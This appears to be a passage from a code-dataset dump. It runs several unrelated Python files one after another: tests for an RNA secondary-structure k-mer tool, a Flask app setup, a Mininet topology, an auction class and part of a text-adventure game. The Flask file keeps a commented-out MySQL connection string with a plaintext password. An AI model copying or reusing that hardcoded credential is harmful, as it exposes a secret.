    process = SecStructure(data, data, k, peak, top, feature, cmd, struct_data, no_sec_peak)
    alphabet1 = process.getStructProfile1().getAlphabet()
    alphabet2 = process.getStructProfile2().getAlphabet()
    kmer_counts1 = process.getStructProfile1().getProfile()
    kmer_counts2 = process.getStructProfile2().getProfile()
    results = SecStructure.processData(process)
    template1 = results[0][0]
    template2 = results[1][0]
    dotbracket_string1 = results[0][1]
    dotbracket_string2 = results[1][1]
    # Testing
    assert len(alphabet1) == 6
    for e in ["S", "H", "B", "I", "M", "E"]:
        assert e in alphabet1
    assert len(alphabet2) == 2
    assert "S" in alphabet2
    assert "E" in alphabet2
    assert kmer_counts1 == {'EE': 4, 'ES': 1, 'SS': 11, 'SH': 1, 'HH': 3, 'II': 4, 'IS': 1, 'SM': 1, 'MM': 1, 'BB': 4,
                            'BS': 1}
    assert kmer_counts2 == {'SS': 20, 'EE': 7, 'ES': 3, 'SE': 2}
    assert template1 == "EEESSSIIISSSBBBSSSHHHSSSSSSIIISSSMMMSSSHHHSSSEEE"
    assert dotbracket_string1 == "...(((...(((...(((...))))))...)))...(((...)))..."
    assert template2 == "EEESSSSSSEEE"
    assert dotbracket_string2 == "...((()))..."
    # Test2: with peak position
    no_sec_peak = 0  # True
    # Executing
    process2 = SecStructure(data, data, k, peak, top, feature, cmd, struct_data, no_sec_peak)
    alphabet1 = process2.getStructProfile1().getAlphabet()
    alphabet2 = process2.getStructProfile2().getAlphabet()
    kmer_counts1 = process2.getStructProfile1().getProfile()
    kmer_counts2 = process2.getStructProfile2().getProfile()
    results = SecStructure.processData(process2)
    template1 = results[0][0]
    template2 = results[1][0]
    dotbracket_string1 = results[0][1]
    dotbracket_string2 = results[1][1]
    # Testing: lowercase letters mark peak positions, doubling the alphabet
    assert len(alphabet1) == 10
    for e in ["s", "h", "b", "i", "m", "E", "S", "B", "I", "E"]:
        assert e in alphabet1
    assert len(alphabet2) == 4
    for e in ["s", "S", "e", "E"]:
        assert e in alphabet2
    assert kmer_counts1 == {'eE': 1, 'Es': 1, 'sS': 1, 'Sh': 1, 'iI': 1, 'Is': 1, 'bB': 1, 'Bs': 1}
    assert kmer_counts2 == {'sS': 3, 'Ss': 2, 'sE': 1, 'Ee': 1, 'Se': 1}
    assert template1 == "EEESSSIIISSSBBBSSSSSSSSSIIISSSEEE"
    assert dotbracket_string1 == "...(((...(((...((())))))...)))..."
    assert template2 == "EEESSSSSSEEE"
    assert dotbracket_string2 == "...((()))..."
    # Test3: different alphabets
    sProfile1 = process.getStructProfile1()
    sProfile2 = process.getStructProfile2()
    # Test3a: alphabets with no multiloop
    alphabet3 = ["S", "B", "E"]
    alphabet4 = ["S", "I", "E"]
    sProfile1.setAlphabet(alphabet3)
    sProfile2.setAlphabet(alphabet4)
    results = SecStructure.processData(process)
    template1 = results[0][0]
    template2 = results[1][0]
    dotbracket_string1 = results[0][1]
    dotbracket_string2 = results[1][1]
    assert template1 == "EEESSSBBBSSSSSSSSSEEE"
    assert dotbracket_string1 == "...(((...((())))))..."
    assert template2 == "EEESSSIIISSSSSSIIISSSEEE"
    assert dotbracket_string2 == "...(((...((()))...)))..."
    # Test3b: alphabets with only hairpin or hairpin and multiloop
    alphabet5 = ["S", "H", "E"]
    alphabet6 = ["S", "H", "M", "E"]
    sProfile1.setAlphabet(alphabet5)
    sProfile2.setAlphabet(alphabet6)
    results = SecStructure.processData(process)
    template1 = results[0][0]
    template2 = results[1][0]
    dotbracket_string1 = results[0][1]
    dotbracket_string2 = results[1][1]
    assert template1 == "EEESSSHHHSSSEEE"
    assert dotbracket_string1 == "...(((...)))..."
    assert template2 == "EEESSSHHHSSSMMMSSSHHHSSSEEE"
    assert dotbracket_string2 == "...(((...)))...(((...)))..."
    # Test3c: ('flawed') alphabets with no multiloops
    alphabet7 = ["S", "H", "E", "B", "I"]
    alphabet8 = ["S", "M", "E"]  # should be equal to ["S","E"]
    sProfile1.setAlphabet(alphabet7)
    sProfile2.setAlphabet(alphabet8)
    results = SecStructure.processData(process)
    template1 = results[0][0]
    template2 = results[1][0]
    dotbracket_string1 = results[0][1]
    dotbracket_string2 = results[1][1]
    assert template1 == "EEESSSIIISSSBBBSSSHHHSSSSSSIIISSSEEE"
    assert dotbracket_string1 == "...(((...(((...(((...))))))...)))..."
    assert template2 == "EEESSSSSSEEE"
    assert dotbracket_string2 == "...((()))..."
def test_createColorVector():
    """Check createColorVector's per-position heat-map values.

    Verifies the log2-scaled colouring with no normalization, with a
    normalization vector, and with peak-position (lowercase) k-mers,
    against independently recomputed expected values.
    """
    # Test1: no normalization vector wanted
    k = 2
    no_sec_peak = 1
    template = "EEESSSIIISSSBBBSSSHHHSSSSSSIIISSSEEE"
    kmer_counts = {"EE": 5, "ES": 7, "SS": 20, "SI": 10, "II": 15, "IS": 11, "SB": 5, "BB": 6, "BS": 5, "SH": 4,
                   "HH": 5, "HS": 4, "SE": 7}
    template_sTree = STree.STree(template)
    normalization_vector1 = None
    color_hm = {str(i): 0 for i in range(1, len(template) + 1)}
    # Executing
    new_color_hm1, not_matched1, color_domain_max1 = createColorVector(k, template_sTree, kmer_counts, color_hm,
                                                                       no_sec_peak, normalization_vector1)
    assert len(color_hm) == len(new_color_hm1)
    for i in color_hm.keys():
        x = color_hm[i]
        if x > 0:
            assert new_color_hm1[i] == math.log(x, 2)
        else:
            assert new_color_hm1[i] == 0
    assert len(not_matched1) == 0
    assert color_domain_max1 == 4.954196310386876
    # Test2: with normalization vector
    normalization_vector2 = {"EE": 0, "ES": 0, "SS": 0.7, "SI": 0.1, "II": 0.2, "IS": 0, "SB": 0, "BB": 0, "BS": 0,
                             "SH": 0, "HH": 0, "HS": 0, "SE": 0}
    # Execution
    color_hm = {str(i): 0 for i in range(1, len(template) + 1)}
    new_color_hm2, not_matched2, color_domain_max2 = createColorVector(k, template_sTree, kmer_counts, color_hm,
                                                                       no_sec_peak, normalization_vector2)
    # Recompute the expected heat map independently with re.finditer.
    last_idx = -1
    last_kmer = ""
    test_color_hm = {str(i): 0 for i in range(1, len(template) + 1)}
    for kmer in normalization_vector2:
        indices_list = [t.start() for t in re.finditer('(?={0})'.format(re.escape(kmer)), template)]
        indices_list.sort()
        norm = normalization_vector2[kmer]
        if norm == 0:
            norm = 1
        for idx in indices_list:
            for i in range(0, k):
                current_idx = str(idx + i + 1)
                if last_idx + 2 == int(current_idx) and last_kmer == kmer:
                    continue
                test_color_hm[current_idx] += (kmer_counts[kmer] / norm)
            last_idx = idx
            last_kmer = kmer
    test_color_hm = {x: math.log(y, 2) if y > 0 else y for x, y in test_color_hm.items()}
    test_color_domain_max = max(test_color_hm.values())
    # Testing
    assert new_color_hm1 is not new_color_hm2
    assert len(color_hm) == len(new_color_hm2)
    assert len(not_matched2) == 0
    assert color_domain_max2 == test_color_domain_max
    for i in new_color_hm2.keys():
        assert new_color_hm2[i] == test_color_hm[i]
    # Test3: normalization vector and secondary peak position
    kmer_counts2 = {"Ee": 5, "eS": 7, "sS": 20, "Si": 10, "iI": 15, "iS": 11, "Sb": 5, "Bb": 6, "bS": 5, "sH": 4,
                    "Hh": 5, "hS": 4, "Se": 7}
    no_sec_peak2 = 0
    # Execution
    color_hm = {str(i): 0 for i in range(1, len(template) + 1)}
    new_color_hm3, not_matched3, color_domain_max3 = createColorVector(k, template_sTree, kmer_counts2, color_hm,
                                                                       no_sec_peak2, normalization_vector2)
    test_color_hm2 = {str(i): 0 for i in range(1, len(template) + 1)}
    for kmer in kmer_counts2.keys():
        indices_list = [t.start() for t in re.finditer('(?={0})'.format(re.escape(kmer.upper())), template)]
        indices_list.sort()
        norm = normalization_vector2[kmer.upper()]
        if norm == 0:
            norm = 1
        for idx in indices_list:
            # use only peak-position in 2-mer for visualization
            idx = [idx + i for i in range(0, len(kmer)) if kmer[i].isupper()][0]
            test_color_hm2[str(idx + 1)] += (kmer_counts2[kmer] / norm)
    test_color_hm2 = {x: math.log(y, 2) if y > 0 else y for x, y in test_color_hm2.items()}
    test_color_domain_max2 = max(test_color_hm2.values())
    # Testing
    assert len(not_matched3) == 0
    assert new_color_hm2 is not new_color_hm3
    assert len(color_hm) == len(new_color_hm3)
    for i in test_color_hm2:
        assert test_color_hm2[i] == new_color_hm3[i]
    assert test_color_domain_max2 == color_domain_max3
def test_helpAddIBloop():
    """Check helpAddIBloop's insertion of internal-loop/bulge elements.

    Exercises forward and backward passes with internal loops and bulges
    enabled individually and together.
    """
    k = 3
    # Test 1: forward and all true
    template1 = ["EEE"]
    internalloop = True
    bulge = True
    forward = True
    # Execution
    new_template1 = helpAddIBloop(k, template1, internalloop, bulge, forward)
    # Test 2: backward and all true
    template2 = ["EEE", "SSS", "III", "SSS", "BBB", "SSS", "HHH"]
    internalloop = True
    bulge = True
    forward = False
    # Execution
    new_template2 = helpAddIBloop(k, template2, internalloop, bulge, forward)
    # Test 3: only internal loops, forward and backward
    template3_f = ["EEE"]
    template3_b = ["EEE", "SSS", "III", "SSS", "HHH"]
    internalloop = True
    bulge = False
    forward = True
    # Execution
    new_template3_f = helpAddIBloop(k, template3_f, internalloop, bulge, forward)
    forward = False
    new_template3_b = helpAddIBloop(k, template3_b, internalloop, bulge, forward)
    # Test 4: only bulges, forward and backward
    template4_f = ["EEE"]
    template4_b = ["EEE", "SSS", "BBB", "SSS", "HHH"]
    internalloop = False
    bulge = True
    forward = True
    # Execution
    new_template4_f = helpAddIBloop(k, template4_f, internalloop, bulge, forward)
    forward = False
    new_template4_b = helpAddIBloop(k, template4_b, internalloop, bulge, forward)
    # Testing
    assert new_template1 == ["EEE", "SSS", "III", "SSS", "BBB"]
    assert new_template2 == ["EEE", "SSS", "III", "SSS", "BBB", "SSS", "HHH", "SSS", "SSS", "III"]
    assert new_template3_f == ["EEE", "SSS", "III"]
    assert new_template3_b == ["EEE", "SSS", "III", "SSS", "HHH", "SSS", "III"]
    assert new_template4_f == ["EEE", "SSS", "BBB"]
    assert new_template4_b == ["EEE", "SSS", "BBB", "SSS", "HHH", "SSS"]
def test_element2dotbracket():
    """Check element2dotbracket's conversion of element lists to dot-bracket.

    Each template is converted in opening (True) and closing (False)
    segments and the concatenation is compared with the expected string.
    """
    k3 = 3
    k2 = 2
    k4 = 4
    # Test1 without multiloop
    elem_list1 = ["EEE", "SSS", "III", "SSS", "BBB", "SSS", "HHH", "SSS", "SSS", "III", "SSS", "EEE"]
    dotbracket_string1 = "...(((...(((...(((...))))))...)))..."
    # Test2 with multiloop
    elem_list2 = ["EE", "SS", "II", "SS", "HH", "SS", "II", "SS", "MM", "SS", "BB", "SS", "HH", "SS", "SS", "EE"]
    dotbracket_string2 = "..((..((..))..))..((..((..)))).."
    # Test 3 without loops
    elem_list3 = ["EEEE", "SSSS", "SSSS", "EEEE"]
    dotbracket_string3 = "....(((())))...."
    # Test 5 with everything
    elem_list4 = ["EEE", "SSS", "III", "SSS", "BBB", "SSS", "HHH", "SSS", "SSS", "III", "SSS", "MMM", "SSS", "HHH",
                  "SSS", "EEE"]
    dotbracket_string4 = "...(((...(((...(((...))))))...)))...(((...)))..."
    # Execution
    db1 = []
    db1.extend(element2dotbracket(elem_list1, k3, 0, 6, True))
    db1.extend(element2dotbracket(elem_list1, k3, 7, len(elem_list1) - 1, False))
    db1 = ''.join(db1)
    db2 = []
    db2.extend(element2dotbracket(elem_list2, k2, 0, 4, True))
    db2.extend(element2dotbracket(elem_list2, k2, 5, 8, False))
    db2.extend(element2dotbracket(elem_list2, k2, 9, 12, True))
    db2.extend(element2dotbracket(elem_list2, k2, 13, len(elem_list2) - 1, False))
    db2 = ''.join(db2)
    db3 = []
    db3.extend(element2dotbracket(elem_list3, k4, 0, 1, True))
    db3.extend(element2dotbracket(elem_list3, k4, 2, len(elem_list3) - 1, False))
    db3 = ''.join(db3)
    db4 = []
    db4.extend(element2dotbracket(elem_list4, k3, 0, 6, True))
    db4.extend(element2dotbracket(elem_list4, k3, 7, 11, False))
    db4.extend(element2dotbracket(elem_list4, k3, 12, 13, True))
    db4.extend(element2dotbracket(elem_list4, k3, 14, len(elem_list4) - 1, False))
    db4 = ''.join(db4)
    # testing
    assert db1 == dotbracket_string1
    assert db2 == dotbracket_string2
    assert db3 == dotbracket_string3
    assert db4 == dotbracket_string4
|
5,627 | f494d8aeee8c72cce8fc14e44ca896bcf30c100a | from config import Config
from flask import Flask
from flask_cors import CORS
from flask_migrate import Migrate
from flask_sqlalchemy import SQLAlchemy
# Application bootstrap: create the Flask app and its extensions at import
# time so other modules can do `from <package> import app, db`.
app = Flask(__name__)
CORS(app)  # allow cross-origin requests (e.g. from a separate frontend)
app.config.from_object(Config)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///ws.db'
# app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://api:uyLmQ5M1AjCvm1R2@localhost/ws'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False  # silence modification-tracking warning/overhead
db = SQLAlchemy(app)
migrate = Migrate(app, db)
# Imported last (deliberate circular-import pattern) so route handlers can
# see the fully-configured `app` and `db`.
from ws import routes
|
5,628 | 8c69813bc576a56c25c828fe24e2707e65ac0d0d | #!/usr/bin/python
"""
demo_mininet_topo.py
Sample topology class with Mininet.
G = {V, E}
V = {h1, h2, h3, h4, h51, h52, s0, s1, s4, s5}
# of hosts = 6
# of switches = 4
E = {
(h1, s1), (h2, s1), (h3, s1),
(h4, s4),
(h51, s5), (h52, s5),
(s0, s1), (s0, s4), (s5, s4)
}
"""
from mininet.topo import Topo
class DemoTopology(Topo):
    """Sample Mininet topology: six hosts behind four switches (see module docstring)."""

    def __init__(self):
        Topo.__init__(self)
        # Create hosts and switches, keeping each node handle as an
        # attribute (self.h1, self.s0, ...) like the original code did.
        for host_name in ('h1', 'h2', 'h3', 'h4', 'h51', 'h52'):
            setattr(self, host_name, self.addHost(host_name))
        for switch_name in ('s0', 's1', 's4', 's5'):
            setattr(self, switch_name, self.addSwitch(switch_name))
        # Wire hosts to their access switches, then the switch backbone,
        # in the same order as the original addLink calls.
        edges = [('h1', 's1'), ('h2', 's1'), ('h3', 's1'),
                 ('h4', 's4'),
                 ('h51', 's5'), ('h52', 's5'),
                 ('s0', 's1'), ('s0', 's4'), ('s5', 's4')]
        for left, right in edges:
            self.addLink(getattr(self, left), getattr(self, right))
# Mininet looks factories up in this module-level dict when run as, e.g.:
#   sudo mn --custom demo_mininet_topo.py --topo demo
topos = {
    'demo': lambda: DemoTopology()
}
5,629 | 9e05f883d80d7583c9f7e16b2fb5d3f67896388d | from auction_type import AuctionType
from bid import Bid
class Auction(object):
    """A sale listing that is either a bidding auction or a buy-now offer."""

    def __init__(self, name, type, status, start_price, buy_now_price):
        # NOTE: 'type' shadows the builtin, but the parameter name is kept
        # for compatibility with existing keyword-argument callers.
        self.name = name
        self.type = type
        self.status = status
        # Bug fix: 'bids' was only created for BID auctions, so calling
        # add_bid() on a BUY_NOW auction raised AttributeError.
        self.bids = []
        if AuctionType.BID == type:
            self.start_price = start_price
        if AuctionType.BUY_NOW == type:
            self.buy_now_price = buy_now_price

    def add_bid(self, price):
        """Record a new Bid at *price*."""
        self.bids.append(Bid(price))
5,630 | 535c0975c688a19963e4c53f6029626d286b41d6 | import random
import colorama
from termcolor import colored
from reusables.string_manipulation import int_to_words
from app.common_functions import comma_separated, add_dicts_together, remove_little_words, odds
from app.load_data import items, buildings, wild_mobs, names, adjectives
colorama.init()
def find_unique_names(quantity, name_list, taken_names):
    """Pick up to *quantity* names from *name_list* that are not already taken.

    The available names are shuffled first, so the selection (and its
    order) is random.
    """
    available = [name for name in name_list if name not in taken_names]
    random.shuffle(available)
    return available[:quantity]
def dropper(rarity):
    """Roll a random drop count for the given rarity tier.

    A random number of attempts (0-10) is made; each attempt succeeds when
    randint(0, threshold) lands on 1, so rarer tiers (larger thresholds)
    drop less often.  Returns the number of successful attempts.
    """
    thresholds = {'super rare': 100,
                  'rare': 50,
                  'uncommon': 25,
                  'common': 5,
                  'super common': 2}
    ceiling = thresholds[rarity]
    attempts = random.randint(0, 10)
    dropped = 0
    for _ in range(attempts):
        if random.randint(0, ceiling) == 1:
            dropped += 1
    return dropped
def drop_building(dictionary, p, limit=None):
    """Randomly instantiate Building objects for player *p*'s current square.

    dictionary -- building-name -> attribute dict (read keys: 'rarity',
                  'category'; the rest are passed through to Building).
    limit      -- cap on the total number of buildings generated
                  (defaults to the number of available adjectives).
    Duplicate non-residences are disambiguated as "<Name>'s X" or
    "the <Adjective> X"; duplicate residences as "<Name>'s x".  The names
    used are recorded on p.square so later drops stay unique.
    """
    limit = limit or len(adjectives)
    drops_i = []
    for k, v in dictionary.items():
        quantity = dropper(v['rarity'])
        # Clamp to the remaining budget and consume it.
        quantity = quantity if quantity < limit else limit
        limit -= quantity
        if quantity:
            if quantity > 1 and v['category'] != 'residence':
                # Split the duplicates randomly between the two naming forms.
                n = random.randint(0, quantity)
                unique_names = find_unique_names(quantity - n, names, p.square.unique_building_names)
                p.square.unique_building_names += unique_names
                for i in range(0, quantity - n):
                    drops_i.append(Building(name=f"{unique_names[i]}'s {remove_little_words(k).capitalize()}", p=p, **v))
                unique_adjectives = find_unique_names(n, adjectives, p.square.unique_building_names)
                p.square.unique_building_names += unique_adjectives
                for i in range(0, n):
                    drops_i.append(Building(name=f"the {unique_adjectives[i]} {remove_little_words(k).capitalize()}", p=p, **v))
            elif quantity > 1 and v['category'] == 'residence':
                unique_house_names = find_unique_names(quantity, names, p.square.unique_house_names)
                p.square.unique_house_names += unique_house_names
                for i in range(0, quantity):
                    drops_i.append(Building(name=f"{unique_house_names[i]}'s {remove_little_words(k)}", p=p, **v))
            else:
                # Single copy keeps its plain catalogue name.
                drops_i.append(Building(name=k, p=p, **v))
    return drops_i
def drop_mob(dictionary, p, limit=None, square=None):
    """Randomly instantiate Mob objects for a map square.

    dictionary -- mob-name -> attribute dict (reads 'rarity', rest passed
                  through to Mob).
    square     -- defaults to the player's current square.
    limit      -- defaults to the number of names not yet used on *square*.
    NOTE(review): availability is checked against *square*'s name lists but
    new names are recorded on p.square — when square != p.square this looks
    inconsistent; confirm intended behaviour.
    """
    square = square or p.square
    limit = limit or len(names) - len(square.unique_mob_names)
    drops_i = []
    for k, v in dictionary.items():
        quantity = dropper(v['rarity'])
        # Clamp to the remaining naming budget and consume it.
        quantity = quantity if quantity < limit else limit
        limit -= quantity
        if quantity:
            if quantity > 1:
                # Multiple copies each become "<kind> named <Name>".
                unique_names = find_unique_names(quantity, names, square.unique_mob_names)
                p.square.unique_mob_names += unique_names
                for i in range(0, len(unique_names)):
                    drops_i.append(Mob(name=f"{k} named {unique_names[i]}", p=p, **v))
            else:
                if k not in [n.name for n in p.square.mobs]:
                    drops_i.append(Mob(name=k, p=p, **v))
                else:
                    # The bare kind-name is already present on this square:
                    # personalise the newcomer instead.
                    name = find_unique_names(1, names, square.unique_mob_names)[0]
                    drops_i.append(Mob(name=f"{k} named {name}", p=p, **v))
    return drops_i
def drop_item(dictionary):
    """ Randomly generates objects based on rarity """
    generated = []
    for item_name, item_data in dictionary.items():
        count = dropper(item_data['rarity'])
        if count:
            generated.append(Item(name=item_name, quantity=count, **item_data))
    return generated
class MapSquare:
    """One square of the world map: a terrain type plus its generated contents."""

    def __init__(self, name="", square_type=None):
        square_types = ["forest", "mountains", "desert", "city", "swamp", "ocean"]
        # Pick a random terrain when none is given.
        self.square_type = square_type or square_types[random.randint(0, len(square_types) - 1)]
        self.name = name
        # Name bookkeeping so generated mobs/buildings/houses stay unique.
        self.unique_mob_names = []
        self.unique_building_names = []
        self.unique_house_names = []
        # Bug fix: these used to be mutable class attributes, so every
        # MapSquare shared the same lists until generate_* reassigned them.
        # They are now per-instance from the start.
        self.mobs = []
        self.items = []
        self.buildings = []

    def generate_items(self):
        """Populate self.items from the master + terrain-specific item tables."""
        self.items = drop_item(add_dicts_together(items["master"], items[self.square_type]))

    def generate_buildings(self, p):
        """Populate self.buildings for player *p* from the building tables."""
        self.buildings = drop_building(add_dicts_together(buildings["master"], buildings[self.square_type]), p)

    def generate_mobs(self, p):
        """Populate self.mobs for player *p* from the wild-mob tables."""
        self.mobs = drop_mob(add_dicts_together(wild_mobs["master"], wild_mobs[self.square_type]), p)

    def clean_up_map(self):
        """ Remove items with quantity of zero from the map inventory"""
        self.items = [i for i in self.items if i.quantity != 0]

    @staticmethod
    def map_picture(the_map, p):
        """With the player's location in the center, draw a 5 x 5 map with map square type
        and coordinates in each square"""
        # Top-left coordinate of the 5x5 window centred on the player.
        xy = (p.location[0] - 2, p.location[1] + 2)
        map_coords = []
        for y in range(0, 5):
            row = [(xy[0] + x, xy[1] - y) for x in range(0, 5)]
            map_coords.append(row)
        pretty_map = []
        for r in map_coords:
            row = []
            for coordinates in r:
                if coordinates in the_map.keys():
                    # Mark quest (*) and job ($) destinations inside the cell.
                    if p.quest and p.job and p.quest[1] == coordinates and p.job.location == coordinates:
                        star = '*$ '
                    elif p.quest and p.quest[1] == coordinates:
                        star = ' * '
                    elif p.job and p.job.location == coordinates:
                        star = ' $ '
                    else:
                        star = '   '
                    row.append("|{!s:9}{}|".format(the_map[coordinates].square_type, star))
                else:
                    # Unexplored square: blank cell of the same width.
                    row.append("|{!s:12}|".format(' '))
            pretty_map.append(row)
        for row in pretty_map:
            print(''.join(row))
class Player:
    """The human player: position, possessions, statistics, and win/phase bookkeeping."""

    def __init__(self, name, location):
        self.name = name
        self.location = location        # current (x, y) map coordinate
        self.square = None              # map-square object the player stands on
        self.money = 0
        self.quest = None               # active quest tuple (item, target, text) — see Mob.generate_quest
        self.job = None
        self.phase = "day"              # alternates between "day" and "night"
        self.equipped_weapon = None
        self.major_armor = None
        self.minor_armor = None
        self.building_local = None      # building the player is currently inside, if any
        self.inventory = []
        self.skills = {}                # skill name -> mastery percentage
        self.health = 100
        self.greeting_count = 0
        self.body_count = 0
        self.assassination_count = 0
        self.hit_list = []              # assassination targets collected from mob quests
        self.death_count = 0
        # TODO increase insurance cost every death?
        self.food_count = 0
        self.run_away_count = 0
        self.speed_bonus = False
        self.game_won = False

    def game_over(self):
        """Announce victory (only once) and grant the bravery/cowardice achievements."""
        if self.game_won is False:
            self.game_won = True
            print(colored("You have won the game!", "green"))
            print("You may continue playing to earn more achievements if you wish.")
            if self.run_away_count == 0:
                print("Congratulations, you have achieved the True Bravery achievement, having won the game without ever running away from a fight.")
            if self.run_away_count > 100:
                print("Congratulations, you have achieved the True Cowardice achievement, having won the game after running away from over 100 battles.")

    def clean_up_inventory(self):
        """ Remove items with quantity of zero from the player's inventory"""
        self.inventory = [i for i in self.inventory if i.quantity != 0]

    def phase_change(self, the_map):
        """Flip day/night and refresh every square the player is NOT standing on:
        loot, shop wares, job openings, and (at dawn) mob health/state."""
        self.phase = 'day' if self.phase == 'night' else 'night'
        for k, square in the_map.items():
            if self.location != k:
                square.generate_items()
                for b in square.buildings:
                    if b.ware_list:
                        # Re-roll shop stock; retry until at least one ware drops.
                        b.wares = drop_item(b.ware_list)
                        while not b.wares:
                            b.wares = drop_item(b.ware_list)
                    if b.name not in ('a castle', 'a volcanic base'):
                        # Re-roll job openings for ordinary (non-boss) buildings.
                        jobs = {}
                        buiding_dict = add_dicts_together(buildings['master'], buildings[square.square_type])
                        for key, v in buiding_dict.items():
                            if key == b.name and v.get('jobs'):
                                for name, values in v['jobs'].items():
                                    jobs[name] = values
                        b.jobs = b.drop_job(jobs)
                if self.phase == 'day':
                    # Dawn: reset the night-time speed bonus and heal/calm mobs.
                    self.speed_bonus = False
                    for mob in square.mobs:
                        mob.health = 100
                        mob.irritation_level = 0
                        # Clear mob quests once the player no longer has one.
                        mob.quest = None if self.quest is None else mob.quest
                    if not square.mobs:
                        # NOTE(review): 'names' is a module-level list — confirm its scope.
                        square.mobs = drop_mob(add_dicts_together(wild_mobs["master"], wild_mobs[self.square.square_type]),
                                               self, limit=len(names), square=square)

    def formatted_inventory(self):
        """Return the inventory as a human-readable, comma-separated string."""
        formatted = []
        for item in self.inventory:
            if item.quantity > 1:
                formatted.append(f"{int_to_words(item.quantity)} {item.plural}")
            else:
                formatted.append(item.name)
        if formatted:
            return comma_separated(formatted)
        else:
            return "nothing"

    def pretty_inventory(self):
        """Describe inventory, equipped weapon, and worn armor in full sentences."""
        w = self.equipped_weapon
        major = self.major_armor.defense if self.major_armor else 0
        minor = self.minor_armor.defense if self.minor_armor else 0
        # Each point of armor defense is worth a 5% damage reduction.
        armor_defense = (major + minor) * 5
        armors = [self.major_armor.name if self.major_armor else None, self.minor_armor.name if self.minor_armor else None]
        inventory = {'inventory_items': f"You have {self.formatted_inventory()} in your inventory.",
                     'weapon': f"You are wielding {int_to_words(w.quantity)} "
                               f"{remove_little_words(w.name) if w.quantity == 1 else w.plural}." if w else None,
                     'armor': f"You are wearing {' and '.join(x for x in armors if x)}, "
                              f"giving you a {armor_defense}% reduction in incoming damage." if self.minor_armor or self.major_armor else None}
        return '\n'.join(v for v in inventory.values() if v)

    def status(self):
        """Summarize health, location, skills, money, and employment."""
        skills = [f"{k}: {v}%." for k, v in self.skills.items()]
        job = f"You have a job as a {self.job.name}." if self.job else None
        quest = "You have a quest." if self.quest else None
        if job and quest:
            job_string = "\n".join([job, quest])
        elif job or quest:
            job_string = job if job else quest
        else:
            job_string = "You do not have a job, and you are not contributing to society."
        status_string = {
            'health': f'Currently, you have {self.health} health.',
            'location': f'You are located on map coordinates {self.location}, '
                        f'which is {self.square.square_type}.',
            'building_local': f'You are inside {self.building_local.name}.' if self.building_local else None,
            'skills': '\n'.join(skills) if skills else "You don't have any skills.",
            'money': f"You have ${self.money} in your wallet.",
            'job': job_string}
        return '\n'.join(v for v in status_string.values() if v)

    def statistics(self):
        """Print the lifetime gameplay counters."""
        print(f"You have killed {self.body_count} mobs.")
        print(f"You have ran away from {self.run_away_count} battles.")
        print(f"You have eaten {self.food_count} items.")
        print(f"You have performed {self.assassination_count} assassinations.")
        print(f"You have talked to mobs {self.greeting_count} times.")

    def view_hit_list(self):
        """Print the outstanding assassination targets, if any."""
        if self.hit_list:
            print(f"If you ever run across these shady characters, be sure to take their names off your list: {comma_separated(self.hit_list)}")
        else:
            print("Looks like you don't know of anyone who needs to be dead.")

    def increase_skill(self, skill, increase):
        """Raise mastery of *skill* by *increase* percent, creating the skill if new."""
        try:
            self.skills[skill] += increase
        except KeyError:
            # First time learning this skill.
            self.skills[skill] = increase
        print(f"You have increased your mastery of {skill} by {increase}% for a total of {self.skills[skill]}%.")
class Item:
    """A game item (loot, ware, weapon, or armor piece).

    All optional attributes are normalized so that falsy arguments
    (0, '', empty containers) collapse to None, matching how the rest
    of the code tests them for truthiness.
    """

    def __init__(self, name, quantity, plural, category=None, perishable=None,
                 flammable=None, rarity=None, price=None, weapon_rating=None, defense=None):
        self.name = name
        self.quantity = quantity
        self.plural = plural
        self.category = category or None
        self.perishable = perishable or None
        self.flammable = flammable or None
        self.rarity = rarity or None
        self.price = price or None
        self.weapon_rating = weapon_rating or None
        self.defense = defense or None

    def copy(self):
        """Return a new Item with the same attribute values.

        Bug fix: ``price`` was previously omitted from the copy, so
        duplicated items silently lost their price.
        """
        return Item(name=self.name, quantity=self.quantity, plural=self.plural, category=self.category,
                    perishable=self.perishable, flammable=self.flammable, rarity=self.rarity,
                    price=self.price, weapon_rating=self.weapon_rating, defense=self.defense)
class Building(object):
    """A structure on a map square; may stock wares, house mobs, and offer jobs."""

    def __init__(self, name, p, plural, category=None, rarity=None, ware_list=None, mobs=None, jobs=None):
        self.name = name
        self.p = p                      # back-reference to the Player
        self.quantity = 1
        self.plural = plural
        self.category = category or None
        self.rarity = rarity or None
        self.ware_list = ware_list      # pool the shop stock is rolled from
        self.wares = self.drop_wares()
        self.mobs = drop_mob(mobs, p) if mobs else None
        self.jobs = self.drop_job(jobs) if jobs else None
        # End-game buildings get a boss and a unique job instead of the usual drops.
        if self.name in ('a castle', 'a volcanic base'):
            self.boss_mobs_and_jobs()

    def drop_wares(self):
        """Roll the shop stock from ware_list, retrying until at least one ware drops."""
        if self.ware_list:
            wares = drop_item(self.ware_list)
            while not wares:
                wares = drop_item(self.ware_list)
            return wares
        else:
            return []

    def drop_job(self, jobs):
        """Turn a subset of the candidate *jobs* dict into Job objects at this location.

        Each candidate is included when odds(2) fires — presumably a 1-in-2
        chance; confirm against the odds() helper.
        """
        drops_i = []
        for k, v in jobs.items():
            if odds(2):
                drops_i.append(Job(name=k, location=self.p.location, **v))
        return drops_i

    def boss_mobs_and_jobs(self):
        """Outfit this end-game building with a fully armed 500-HP boss and its unique job."""
        boss_major_armors = [Item('a coat of impervious dragon scales', plural='coats of dragon scales', quantity=1, category='major armor', rarity='super rare', defense=5),
                             Item('an enchanted leather duster', plural='enchanted leather dusters', quantity=1, category='major armor', defense=5, rarity='super rare'),
                             Item('a coat of actual live grizzly bears', plural='coats of actual live grizzly bears', quantity=1, category='major armor', defense=5, rarity='super rare')]
        boss_minor_armors = [Item('wings of an angel', plural='wings of angels', quantity=1, rarity='super rare', category='minor armor', defense=5),
                             Item('an OSHA approved hard hat', plural='OSHA approved hard hats', quantity=1, rarity='super rare', category='minor armor', defense=5),
                             Item('a pair boots that were made for walkin', plural='pairs of boots that were made for walkin', quantity=1, rarity='super rare', category='minor armor', defense=5)]
        boss_weapons = [Item('an apache helicopter', plural='apache helicopters', rarity='super rare', weapon_rating=6, quantity=1),
                        Item('a trebuchet', plural='trebuchets', weapon_rating=6, quantity=1, rarity='super rare'),
                        Item('an army of attacking wizards', plural='armies of attacking wizards', weapon_rating=6, quantity=1, rarity='super rare')]
        boss_names = ["the Terrifying Dragon of Soul Slaying", "the Great Salamander of Darkness", "the Squirrel of Destiny", ]
